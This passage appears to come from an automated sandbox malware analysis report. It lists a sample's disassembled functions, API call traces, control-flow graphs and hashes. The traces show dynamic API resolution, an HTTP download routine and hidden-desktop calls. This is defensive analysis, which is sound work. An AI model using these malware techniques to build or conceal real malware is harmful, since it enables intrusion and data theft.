                              • Associated: 00000000.00000002.2156415774.0000000000B81000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2156415774.0000000000C65000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2156415774.0000000000C8E000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2156415774.0000000000C95000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2156415774.0000000000CA4000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2156665832.0000000000CA5000.00000080.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2156771571.0000000000E46000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2156792788.0000000000E47000.00000080.00000001.01000000.00000003.sdmpDownload File
                              Joe Sandbox IDA Plugin
                              • Snapshot File: hcaresult_0_2_7b0000_file.jbxd
                              Yara matches
                              Similarity
                              • API ID: AddressProc$Process$Exitlstrcpy$lstrcatlstrlen$AllocCurrentDefaultGlobalInfoLangMemoryNumaStatusSystemUserVirtual
                              • String ID:
                              • API String ID: 3366406952-0
                              • Opcode ID: 54b2856f75ff870efcb636c692428576a9c840568e66b3468578d815a0b61cd5
                              • Instruction ID: fb366e6ef1794ec52d58ae6f6189779474160285c51949c9cb2c87ec06d581b9
                              • Opcode Fuzzy Hash: 54b2856f75ff870efcb636c692428576a9c840568e66b3468578d815a0b61cd5
                              • Instruction Fuzzy Hash: 1571C831625255FBDB21AFB4DC8DB6F377AAF44702F444015F90AAA292DF389C02DB60
                              Function 007B6C40 Relevance: 31.7, APIs: 16, Strings: 2, Instructions: 229networkstringfileCOMMON
                              Download Yara Rule

                              Control-flow Graph

                              • Executed
                              • Not Executed
                              control_flow_graph 1895 7b6c40-7b6c64 call 7b2930 1898 7b6c66-7b6c6b 1895->1898 1899 7b6c75-7b6c97 call 7b4bc0 1895->1899 1898->1899 1900 7b6c6d-7b6c6f lstrcpy 1898->1900 1903 7b6caa-7b6cba call 7b2930 1899->1903 1904 7b6c99 1899->1904 1900->1899 1908 7b6cc8-7b6cf5 InternetOpenA StrCmpCA 1903->1908 1909 7b6cbc-7b6cc2 lstrcpy 1903->1909 1905 7b6ca0-7b6ca8 1904->1905 1905->1903 1905->1905 1910 7b6cfa-7b6cfc 1908->1910 1911 7b6cf7 1908->1911 1909->1908 1912 7b6ea8-7b6ebb call 7b2930 1910->1912 1913 7b6d02-7b6d22 InternetConnectA 1910->1913 1911->1910 1922 7b6ec9-7b6ee0 call 7b2a20 * 2 1912->1922 1923 7b6ebd-7b6ebf 1912->1923 1914 7b6d28-7b6d5d HttpOpenRequestA 1913->1914 1915 7b6ea1-7b6ea2 InternetCloseHandle 1913->1915 1917 7b6d63-7b6d65 1914->1917 1918 7b6e94-7b6e9e InternetCloseHandle 1914->1918 1915->1912 1920 7b6d7d-7b6dad HttpSendRequestA HttpQueryInfoA 1917->1920 1921 7b6d67-7b6d77 InternetSetOptionA 1917->1921 1918->1915 1924 7b6daf-7b6dd3 call 7d71e0 call 7b2a20 * 2 1920->1924 1925 7b6dd4-7b6de4 call 7d3d90 1920->1925 1921->1920 1923->1922 1926 7b6ec1-7b6ec3 lstrcpy 1923->1926 1925->1924 1936 7b6de6-7b6de8 1925->1936 1926->1922 1938 7b6dee-7b6e07 InternetReadFile 1936->1938 1939 7b6e8d-7b6e8e InternetCloseHandle 1936->1939 1938->1939 1940 7b6e0d 1938->1940 1939->1918 1942 7b6e10-7b6e15 1940->1942 1942->1939 1944 7b6e17-7b6e3d call 7d7310 1942->1944 1947 7b6e3f call 7b2a20 1944->1947 1948 7b6e44-7b6e51 call 7b2930 1944->1948 1947->1948 1952 7b6e53-7b6e57 1948->1952 1953 7b6e61-7b6e8b call 7b2a20 InternetReadFile 1948->1953 1952->1953 1954 7b6e59-7b6e5b lstrcpy 1952->1954 1953->1939 1953->1942 1954->1953
                              APIs
                              • lstrcpy.KERNEL32(00000000,?), ref: 007B6C6F
                              • lstrcpy.KERNEL32(00000000,007DCFEC), ref: 007B6CC2
                              • InternetOpenA.WININET(007DCFEC,00000001,00000000,00000000,00000000), ref: 007B6CD5
                              • StrCmpCA.SHLWAPI(?,0145E360), ref: 007B6CED
                              • InternetConnectA.WININET(00000000,?,?,00000000,00000000,00000003,00000000,00000000), ref: 007B6D15
                              • HttpOpenRequestA.WININET(00000000,GET,?,0145DD98,00000000,00000000,-00400100,00000000), ref: 007B6D50
                              • InternetSetOptionA.WININET(00000000,0000001F,00010300,00000004), ref: 007B6D77
                              • HttpSendRequestA.WININET(00000000,00000000,00000000,00000000,00000000), ref: 007B6D86
                              • HttpQueryInfoA.WININET(00000000,00000013,?,?,00000000), ref: 007B6DA5
                              • InternetReadFile.WININET(00000000,?,000007CF,?), ref: 007B6DFF
                              • lstrcpy.KERNEL32(00000000,?), ref: 007B6E5B
                              • InternetReadFile.WININET(?,00000000,000007CF,?), ref: 007B6E7D
                              • InternetCloseHandle.WININET(00000000), ref: 007B6E8E
                              • InternetCloseHandle.WININET(?), ref: 007B6E98
                              • InternetCloseHandle.WININET(00000000), ref: 007B6EA2
                              • lstrcpy.KERNEL32(00000000,00000000), ref: 007B6EC3
                              Strings
                              Memory Dump Source
                              • Source File: 00000000.00000002.2156214368.00000000007B1000.00000040.00000001.01000000.00000003.sdmp, Offset: 007B0000, based on PE: true
                              • Associated: 00000000.00000002.2156194942.00000000007B0000.00000004.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2156214368.00000000007E7000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2156214368.000000000083E000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2156214368.0000000000846000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2156214368.000000000085F000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2156214368.00000000009E8000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2156400973.00000000009FA000.00000004.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2156415774.00000000009FC000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2156415774.0000000000B81000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2156415774.0000000000C65000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2156415774.0000000000C8E000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2156415774.0000000000C95000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2156415774.0000000000CA4000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2156665832.0000000000CA5000.00000080.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2156771571.0000000000E46000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2156792788.0000000000E47000.00000080.00000001.01000000.00000003.sdmpDownload File
                              Joe Sandbox IDA Plugin
                              • Snapshot File: hcaresult_0_2_7b0000_file.jbxd
                              Yara matches
                              Similarity
                              • API ID: Internet$lstrcpy$CloseHandleHttp$FileOpenReadRequest$ConnectInfoOptionQuerySend
                              • String ID: ERROR$GET
                              • API String ID: 3687753495-3591763792
                              • Opcode ID: 2178a041f10a7ddd28ae0ef781922840b2691cb624b29cf67ebf017f6ecb006a
                              • Instruction ID: 5671ff0c60cba53b3778e2391254ef5922d5d0fcdefe2eb3e88f455343710cc3
                              • Opcode Fuzzy Hash: 2178a041f10a7ddd28ae0ef781922840b2691cb624b29cf67ebf017f6ecb006a
                              • Instruction Fuzzy Hash: EE819371A15215ABDB20DFA4DC89FEE77B8AF44700F144468FA05EB281DB78ED058BA0
                              Function 007B4A60 Relevance: 5.4, APIs: 2, Strings: 1, Instructions: 119memoryCOMMON
                              Download Yara Rule

                              Control-flow Graph

                              • Executed
                              • Not Executed
                              control_flow_graph 2511 7b4a60-7b4afc RtlAllocateHeap 2528 7b4b7a-7b4bbe VirtualProtect 2511->2528 2529 7b4afe-7b4b03 2511->2529 2530 7b4b06-7b4b78 2529->2530 2530->2528
                              APIs
                              • RtlAllocateHeap.NTDLL(00000000), ref: 007B4AA3
                              • VirtualProtect.KERNEL32(00000000,00000004,00000100,?), ref: 007B4BB0
                              Strings
                              Memory Dump Source
                              • Source File: 00000000.00000002.2156214368.00000000007B1000.00000040.00000001.01000000.00000003.sdmp, Offset: 007B0000, based on PE: true
                              • Associated: 00000000.00000002.2156194942.00000000007B0000.00000004.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2156214368.00000000007E7000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2156214368.000000000083E000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2156214368.0000000000846000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2156214368.000000000085F000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2156214368.00000000009E8000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2156400973.00000000009FA000.00000004.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2156415774.00000000009FC000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2156415774.0000000000B81000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2156415774.0000000000C65000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2156415774.0000000000C8E000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2156415774.0000000000C95000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2156415774.0000000000CA4000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2156665832.0000000000CA5000.00000080.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2156771571.0000000000E46000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2156792788.0000000000E47000.00000080.00000001.01000000.00000003.sdmpDownload File
                              Joe Sandbox IDA Plugin
                              • Snapshot File: hcaresult_0_2_7b0000_file.jbxd
                              Yara matches
                              Similarity
                              • API ID: AllocateHeapProtectVirtual
                              • String ID: The Opus Theatre was founded by British-Argentine composer and concert pianist Polo Piatti and officially opened on 7 July 2017 in Hastings, in the United Kingdom.
                              • API String ID: 1542196881-3329630956
                              • Opcode ID: 99dd54ace56067f07b1ac644d3226d196cca43e4dc1057ea11c8b9eb558cfc27
                              • Instruction ID: 8a3e0488aaa690fdbe89caf36d95108ad3b6f447c03750af21d76f94f01ad20d
                              • Opcode Fuzzy Hash: 99dd54ace56067f07b1ac644d3226d196cca43e4dc1057ea11c8b9eb558cfc27
                              • Instruction Fuzzy Hash: EB31F898F8A29C768620EBEF4C47F5F6ED5DF8D750B0240567508F7182C9AD6401CAAA
                              Function 007D2A40 Relevance: 4.5, APIs: 3, Instructions: 33memoryCOMMON
                              Download Yara Rule
                              APIs
                              • GetProcessHeap.KERNEL32(00000000,00000104,00000000,00000000,?), ref: 007D2A6F
                              • RtlAllocateHeap.NTDLL(00000000), ref: 007D2A76
                              • GetUserNameA.ADVAPI32(00000000,00000104), ref: 007D2A8A
                              Memory Dump Source
                              • Source File: 00000000.00000002.2156214368.00000000007B1000.00000040.00000001.01000000.00000003.sdmp, Offset: 007B0000, based on PE: true
                              • Associated: 00000000.00000002.2156194942.00000000007B0000.00000004.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2156214368.00000000007E7000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2156214368.000000000083E000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2156214368.0000000000846000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2156214368.000000000085F000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2156214368.00000000009E8000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2156400973.00000000009FA000.00000004.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2156415774.00000000009FC000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2156415774.0000000000B81000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2156415774.0000000000C65000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2156415774.0000000000C8E000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2156415774.0000000000C95000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2156415774.0000000000CA4000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2156665832.0000000000CA5000.00000080.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2156771571.0000000000E46000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2156792788.0000000000E47000.00000080.00000001.01000000.00000003.sdmpDownload File
                              Joe Sandbox IDA Plugin
                              • Snapshot File: hcaresult_0_2_7b0000_file.jbxd
                              Yara matches
                              Similarity
                              • API ID: Heap$AllocateNameProcessUser
                              • String ID:
                              • API String ID: 1296208442-0
                              • Opcode ID: 0bc8f266c2b71220ba06bb6a184cc5e0e27a80caf76ec03a706e2d0195638152
                              • Instruction ID: cd436e410104ec34b5dd59ae52860295788a8a9157ce19d4726aa00e99d3b735
                              • Opcode Fuzzy Hash: 0bc8f266c2b71220ba06bb6a184cc5e0e27a80caf76ec03a706e2d0195638152
                              • Instruction Fuzzy Hash: 0AF054B1A44654BBD710DF98DD49B9EBBBCF749B21F100216F915E3780D774190486E1
                              Function 007D66E0 Relevance: 210.7, APIs: 115, Strings: 5, Instructions: 696libraryloaderCOMMON
                              Download Yara Rule

                              Control-flow Graph

                              • Executed
                              • Not Executed
                              control_flow_graph 633 7d66e0-7d66e7 634 7d66ed-7d6af9 GetProcAddress * 43 633->634 635 7d6afe-7d6b92 LoadLibraryA * 8 633->635 634->635 636 7d6c08-7d6c0f 635->636 637 7d6b94-7d6c03 GetProcAddress * 5 635->637 638 7d6c15-7d6ccd GetProcAddress * 8 636->638 639 7d6cd2-7d6cd9 636->639 637->636 638->639 640 7d6d4f-7d6d56 639->640 641 7d6cdb-7d6d4a GetProcAddress * 5 639->641 642 7d6d5c-7d6de4 GetProcAddress * 6 640->642 643 7d6de9-7d6df0 640->643 641->640 642->643 644 7d6df6-7d6f0b GetProcAddress * 12 643->644 645 7d6f10-7d6f17 643->645 644->645 646 7d6f8d-7d6f94 645->646 647 7d6f19-7d6f88 GetProcAddress * 5 645->647 648 7d6f96-7d6fbc GetProcAddress * 2 646->648 649 7d6fc1-7d6fc8 646->649 647->646 648->649 650 7d6fca-7d6ff0 GetProcAddress * 2 649->650 651 7d6ff5-7d6ffc 649->651 650->651 652 7d70ed-7d70f4 651->652 653 7d7002-7d70e8 GetProcAddress * 10 651->653 654 7d70f6-7d714d GetProcAddress * 4 652->654 655 7d7152-7d7159 652->655 653->652 654->655 656 7d716e-7d7175 655->656 657 7d715b-7d7169 GetProcAddress 655->657 658 7d7177-7d71ce GetProcAddress * 4 656->658 659 7d71d3 656->659 657->656 658->659
                              APIs
                              • GetProcAddress.KERNEL32(75900000,01444F80), ref: 007D66F5
                              • GetProcAddress.KERNEL32(75900000,01444F20), ref: 007D670D
                              • GetProcAddress.KERNEL32(75900000,01458F68), ref: 007D6726
                              • GetProcAddress.KERNEL32(75900000,01458EF0), ref: 007D673E
                              • GetProcAddress.KERNEL32(75900000,0145CA88), ref: 007D6756
                              • GetProcAddress.KERNEL32(75900000,0145CB90), ref: 007D676F
                              • GetProcAddress.KERNEL32(75900000,0144B058), ref: 007D6787
                              • GetProcAddress.KERNEL32(75900000,0145CB48), ref: 007D679F
                              • GetProcAddress.KERNEL32(75900000,0145CBA8), ref: 007D67B8
                              • GetProcAddress.KERNEL32(75900000,0145C8F0), ref: 007D67D0
                              • GetProcAddress.KERNEL32(75900000,0145CBC0), ref: 007D67E8
                              • GetProcAddress.KERNEL32(75900000,01444F40), ref: 007D6801
                              • GetProcAddress.KERNEL32(75900000,01445020), ref: 007D6819
                              • GetProcAddress.KERNEL32(75900000,01444F60), ref: 007D6831
                              • GetProcAddress.KERNEL32(75900000,01444FA0), ref: 007D684A
                              • GetProcAddress.KERNEL32(75900000,0145C9B0), ref: 007D6862
                              • GetProcAddress.KERNEL32(75900000,0145C9E0), ref: 007D687A
                              • GetProcAddress.KERNEL32(75900000,0144AF68), ref: 007D6893
                              • GetProcAddress.KERNEL32(75900000,01445040), ref: 007D68AB
                              • GetProcAddress.KERNEL32(75900000,0145CAE8), ref: 007D68C3
                              • GetProcAddress.KERNEL32(75900000,0145C8D8), ref: 007D68DC
                              • GetProcAddress.KERNEL32(75900000,0145C998), ref: 007D68F4
                              • GetProcAddress.KERNEL32(75900000,0145C9F8), ref: 007D690C
                              • GetProcAddress.KERNEL32(75900000,01445080), ref: 007D6925
                              • GetProcAddress.KERNEL32(75900000,0145C938), ref: 007D693D
                              • GetProcAddress.KERNEL32(75900000,0145CA10), ref: 007D6955
                              • GetProcAddress.KERNEL32(75900000,0145CB78), ref: 007D696E
                              • GetProcAddress.KERNEL32(75900000,0145C968), ref: 007D6986
                              • GetProcAddress.KERNEL32(75900000,0145CAA0), ref: 007D699E
                              • GetProcAddress.KERNEL32(75900000,0145C908), ref: 007D69B7
                              • GetProcAddress.KERNEL32(75900000,0145CA40), ref: 007D69CF
                              • GetProcAddress.KERNEL32(75900000,0145CB60), ref: 007D69E7
                              • GetProcAddress.KERNEL32(75900000,0145C920), ref: 007D6A00
                              • GetProcAddress.KERNEL32(75900000,0145A070), ref: 007D6A18
                              • GetProcAddress.KERNEL32(75900000,0145C950), ref: 007D6A30
                              • GetProcAddress.KERNEL32(75900000,0145C980), ref: 007D6A49
                              • GetProcAddress.KERNEL32(75900000,014450A0), ref: 007D6A61
                              • GetProcAddress.KERNEL32(75900000,0145CA58), ref: 007D6A79
                              • GetProcAddress.KERNEL32(75900000,014450E0), ref: 007D6A92
                              • GetProcAddress.KERNEL32(75900000,0145C9C8), ref: 007D6AAA
                              • GetProcAddress.KERNEL32(75900000,0145CA28), ref: 007D6AC2
                              • GetProcAddress.KERNEL32(75900000,01445100), ref: 007D6ADB
                              • GetProcAddress.KERNEL32(75900000,01445120), ref: 007D6AF3
                              • LoadLibraryA.KERNEL32(0145CB30,007D051F), ref: 007D6B05
                              • LoadLibraryA.KERNEL32(0145CA70), ref: 007D6B16
                              • LoadLibraryA.KERNEL32(0145CAB8), ref: 007D6B28
                              • LoadLibraryA.KERNEL32(0145CAD0), ref: 007D6B3A
                              • LoadLibraryA.KERNEL32(0145CB00), ref: 007D6B4B
                              • LoadLibraryA.KERNEL32(0145CB18), ref: 007D6B5D
                              • LoadLibraryA.KERNEL32(0145CEC0), ref: 007D6B6F
                              • LoadLibraryA.KERNEL32(0145CE48), ref: 007D6B80
                              • GetProcAddress.KERNEL32(75FD0000,01445240), ref: 007D6B9C
                              • GetProcAddress.KERNEL32(75FD0000,0145CE60), ref: 007D6BB4
                              • GetProcAddress.KERNEL32(75FD0000,01458908), ref: 007D6BCD
                              • GetProcAddress.KERNEL32(75FD0000,0145CE90), ref: 007D6BE5
                              • GetProcAddress.KERNEL32(75FD0000,01445220), ref: 007D6BFD
                              • GetProcAddress.KERNEL32(734B0000,0144B120), ref: 007D6C1D
                              • GetProcAddress.KERNEL32(734B0000,01445480), ref: 007D6C35
                              • GetProcAddress.KERNEL32(734B0000,0144AE78), ref: 007D6C4E
                              • GetProcAddress.KERNEL32(734B0000,0145CEA8), ref: 007D6C66
                              • GetProcAddress.KERNEL32(734B0000,0145CCF8), ref: 007D6C7E
                              • GetProcAddress.KERNEL32(734B0000,01445260), ref: 007D6C97
                              • GetProcAddress.KERNEL32(734B0000,014452A0), ref: 007D6CAF
                              • GetProcAddress.KERNEL32(734B0000,0145CC20), ref: 007D6CC7
                              • GetProcAddress.KERNEL32(763B0000,01445280), ref: 007D6CE3
                              • GetProcAddress.KERNEL32(763B0000,014452C0), ref: 007D6CFB
                              • GetProcAddress.KERNEL32(763B0000,0145CBD8), ref: 007D6D14
                              • GetProcAddress.KERNEL32(763B0000,0145CC80), ref: 007D6D2C
                              • GetProcAddress.KERNEL32(763B0000,014454E0), ref: 007D6D44
                              • GetProcAddress.KERNEL32(750F0000,0144AEA0), ref: 007D6D64
                              • GetProcAddress.KERNEL32(750F0000,0144B210), ref: 007D6D7C
                              • GetProcAddress.KERNEL32(750F0000,0145CDB8), ref: 007D6D95
                              • GetProcAddress.KERNEL32(750F0000,01445500), ref: 007D6DAD
                              • GetProcAddress.KERNEL32(750F0000,014453A0), ref: 007D6DC5
                              • GetProcAddress.KERNEL32(750F0000,0144B238), ref: 007D6DDE
                              • GetProcAddress.KERNEL32(75A50000,0145CCE0), ref: 007D6DFE
                              • GetProcAddress.KERNEL32(75A50000,014453C0), ref: 007D6E16
                              • GetProcAddress.KERNEL32(75A50000,01458938), ref: 007D6E2F
                              • GetProcAddress.KERNEL32(75A50000,0145CC08), ref: 007D6E47
                              • GetProcAddress.KERNEL32(75A50000,0145CE30), ref: 007D6E5F
                              • GetProcAddress.KERNEL32(75A50000,01445520), ref: 007D6E78
                              • GetProcAddress.KERNEL32(75A50000,014452E0), ref: 007D6E90
                              • GetProcAddress.KERNEL32(75A50000,0145CD58), ref: 007D6EA8
                              • GetProcAddress.KERNEL32(75A50000,0145CE78), ref: 007D6EC1
                              • GetProcAddress.KERNEL32(75A50000,CreateDesktopA), ref: 007D6ED7
                              • GetProcAddress.KERNEL32(75A50000,OpenDesktopA), ref: 007D6EEE
                              • GetProcAddress.KERNEL32(75A50000,CloseDesktop), ref: 007D6F05
                              • GetProcAddress.KERNEL32(75070000,01445300), ref: 007D6F21
                              • GetProcAddress.KERNEL32(75070000,0145CDA0), ref: 007D6F39
                              • GetProcAddress.KERNEL32(75070000,0145CCB0), ref: 007D6F52
                              • GetProcAddress.KERNEL32(75070000,0145CE18), ref: 007D6F6A
                              • GetProcAddress.KERNEL32(75070000,0145CBF0), ref: 007D6F82
                              • GetProcAddress.KERNEL32(74E50000,014451A0), ref: 007D6F9E
                              • GetProcAddress.KERNEL32(74E50000,01445400), ref: 007D6FB6
                              • GetProcAddress.KERNEL32(75320000,01445320), ref: 007D6FD2
                              • GetProcAddress.KERNEL32(75320000,0145CC68), ref: 007D6FEA
                              • GetProcAddress.KERNEL32(6F060000,01445340), ref: 007D700A
                              • GetProcAddress.KERNEL32(6F060000,01445360), ref: 007D7022
                              • GetProcAddress.KERNEL32(6F060000,01445540), ref: 007D703B
                              • GetProcAddress.KERNEL32(6F060000,0145CDE8), ref: 007D7053
                              • GetProcAddress.KERNEL32(6F060000,014451C0), ref: 007D706B
                              • GetProcAddress.KERNEL32(6F060000,01445420), ref: 007D7084
                              • GetProcAddress.KERNEL32(6F060000,014454A0), ref: 007D709C
                              • GetProcAddress.KERNEL32(6F060000,01445380), ref: 007D70B4
                              • GetProcAddress.KERNEL32(6F060000,InternetSetOptionA), ref: 007D70CB
                              • GetProcAddress.KERNEL32(6F060000,HttpQueryInfoA), ref: 007D70E2
                              • GetProcAddress.KERNEL32(74E00000,0145CC98), ref: 007D70FE
                              • GetProcAddress.KERNEL32(74E00000,014589B8), ref: 007D7116
                              • GetProcAddress.KERNEL32(74E00000,0145CC38), ref: 007D712F
                              • GetProcAddress.KERNEL32(74E00000,0145CC50), ref: 007D7147
                              • GetProcAddress.KERNEL32(74DF0000,014453E0), ref: 007D7163
                              • GetProcAddress.KERNEL32(6E100000,0145CE00), ref: 007D717F
                              • GetProcAddress.KERNEL32(6E100000,014451E0), ref: 007D7197
                              • GetProcAddress.KERNEL32(6E100000,0145CCC8), ref: 007D71B0
                              • GetProcAddress.KERNEL32(6E100000,0145CD10), ref: 007D71C8
                              Strings
                              Memory Dump Source
                              • Source File: 00000000.00000002.2156214368.00000000007B1000.00000040.00000001.01000000.00000003.sdmp, Offset: 007B0000, based on PE: true
                              • Associated: 00000000.00000002.2156194942.00000000007B0000.00000004.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2156214368.00000000007E7000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2156214368.000000000083E000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2156214368.0000000000846000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2156214368.000000000085F000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2156214368.00000000009E8000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2156400973.00000000009FA000.00000004.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2156415774.00000000009FC000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2156415774.0000000000B81000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2156415774.0000000000C65000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2156415774.0000000000C8E000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2156415774.0000000000C95000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2156415774.0000000000CA4000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2156665832.0000000000CA5000.00000080.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2156771571.0000000000E46000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2156792788.0000000000E47000.00000080.00000001.01000000.00000003.sdmpDownload File
                              Joe Sandbox IDA Plugin
                              • Snapshot File: hcaresult_0_2_7b0000_file.jbxd
                              Yara matches
                              Similarity
                              • API ID: AddressProc$LibraryLoad
                              • String ID: CloseDesktop$CreateDesktopA$HttpQueryInfoA$InternetSetOptionA$OpenDesktopA
                              • API String ID: 2238633743-3468015613
                              • Opcode ID: 0e974a4de164e1c5130ace6a36fc8c8bcdfd2fe8956a7d075f8eabb403bfad24
                              • Instruction ID: a81eda018c2870e5fe5aaa01b80269b990617b77544c0b37c3a84533dbd2f406
                              • Opcode Fuzzy Hash: 0e974a4de164e1c5130ace6a36fc8c8bcdfd2fe8956a7d075f8eabb403bfad24
                              • Instruction Fuzzy Hash: EB6240F563C280AFD754DFA5EDC8A2737B9F7892063508919E9598B360DB34AD00FB60
                              Function 007CF1B0 Relevance: 102.7, APIs: 57, Strings: 1, Instructions: 1156stringCOMMON
                              Download Yara Rule
                              APIs
                              • lstrlen.KERNEL32(007DCFEC), ref: 007CF1D5
                              • lstrcpy.KERNEL32(00000000,007DCFEC), ref: 007CF1F1
                              • lstrlen.KERNEL32(007DCFEC), ref: 007CF1FC
                              • lstrcpy.KERNEL32(00000000,007DCFEC), ref: 007CF215
                              • lstrlen.KERNEL32(007DCFEC), ref: 007CF220
                              • lstrcpy.KERNEL32(00000000,007DCFEC), ref: 007CF239
                              • lstrcpy.KERNEL32(00000000,007E4FA0), ref: 007CF25E
                              • lstrcpy.KERNEL32(00000000,007DCFEC), ref: 007CF28C
                              • lstrcpy.KERNEL32(00000000,007DCFEC), ref: 007CF2C0
                              • lstrcpy.KERNEL32(00000000,007DCFEC), ref: 007CF2F0
                              • lstrlen.KERNEL32(01445160), ref: 007CF315
                              Strings
                              Memory Dump Source
                              • Source File: 00000000.00000002.2156214368.00000000007B1000.00000040.00000001.01000000.00000003.sdmp, Offset: 007B0000, based on PE: true
                              • Associated: 00000000.00000002.2156194942.00000000007B0000.00000004.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2156214368.00000000007E7000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2156214368.000000000083E000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2156214368.0000000000846000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2156214368.000000000085F000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2156214368.00000000009E8000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2156400973.00000000009FA000.00000004.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2156415774.00000000009FC000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2156415774.0000000000B81000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2156415774.0000000000C65000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2156415774.0000000000C8E000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2156415774.0000000000C95000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2156415774.0000000000CA4000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2156665832.0000000000CA5000.00000080.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2156771571.0000000000E46000.00000040.00000001.01000000.00000003.sdmpDownload File
